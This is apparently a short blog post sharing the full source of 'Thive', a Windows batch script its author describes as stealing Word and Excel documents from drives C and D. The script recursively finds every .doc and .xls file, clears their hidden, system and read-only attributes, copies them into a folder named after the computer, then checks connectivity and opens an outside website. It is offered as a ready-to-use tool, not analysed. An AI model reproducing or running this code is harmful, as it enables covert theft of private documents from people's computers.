This is source code Thive Document (*.doc and *.xls) in drive C and D
Created by me
@echo off REM Name : Thive REM Author : Gambit_TDZ Set Thive=%computername%_%random% If not exist "%Thive%" Md "%Thive%" For %%a in (C D) do if exist %%a:\ ( For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do ( attrib -s -h -r "%%b" copy "%%b" "%Thive%" /y) For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do ( attrib -s -h -r "%%b" copy "%%b" "%Thive%" /y) ) :: Ceck connection internet Ping www.google.com>nul If not errorlevel 1 Start iexplorer.exe "http://www.thedlzone.com"
Nenhum comentário:
Postar um comentário